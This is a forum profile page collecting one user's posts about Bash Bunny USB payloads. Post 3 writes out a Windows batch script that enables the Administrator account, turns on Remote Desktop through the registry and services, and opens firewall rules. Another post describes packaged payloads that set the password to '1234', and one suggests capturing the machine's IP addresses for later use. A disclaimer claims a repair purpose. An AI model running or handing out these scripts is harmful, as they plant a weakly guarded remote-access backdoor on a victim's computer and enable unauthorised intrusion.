Jump to content

Vert

Active Members
  • Posts

    34
  • Joined

  • Last visited

Everything posted by Vert

  1. Presenting 3 new bunny payloads: Admin:enables admin account with password 1234 Adminrdp:enables admin with pass 1234 & RDP + Ports UNadminrdp:disables admin account & RDP + Ports UNadminrdp.rar Adminrdp.rar Admin.rar I take no credit for these i only mashed it all together and tested it. my intended use for these was purely for making system repairs easier and take no responsibility for how they may be used.
  2. I'm in the later stages of testing the payload now as is it enables the admin account puts a password of 1234 on it and enables rdp script to enable and disable it all I'm in the last stage of getting the payload to run as admin. #RDPADMIN disable.bat enable.bat ------------------------------------------------------------------------------------- #ADMINENABLE figured id add another bat this one simply enables the admin account with password 1234 switch yes to no to disable again. admin.bat --------------------------------------------------------------------------------------
  3. the idea is the enable the admin account and rdp and open the ports required so far i have come up with this. batch file this following script net user administrator /active:yes net user administrator reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f sc config TermService start= auto net start Termservice netsh firewall set service RemoteDesktop enable netsh advfirewall firewall set rule group="remote desktop" new enable=Yes exit then compile it as a exe so it can be run as admin from the bunny. ive also made a script to disable everything also. net user administrator /active:no reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f sc config TermService start= auto netsh stop Termservice netsh firewall set service RemoteDesktop disable netsh advfirewall firewall set rule group="remote desktop" new enable=no exit i would note that this is just an idea and completely untested the final step would simply having the bunny run the exe files. i was also thinking it would be a good idea to dump the systems internal and external IP for later use. maybe someone wants to step in and complete this half finished payload or add to it.
  4. even on the latest firmware my bunny locks up every time i try to copy the bunnytap anywhere not sure why still.
×
×
  • Create New...